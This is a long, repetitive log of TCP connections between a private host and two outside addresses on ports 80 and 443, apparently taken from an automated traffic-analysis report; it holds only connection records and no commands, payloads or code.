Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
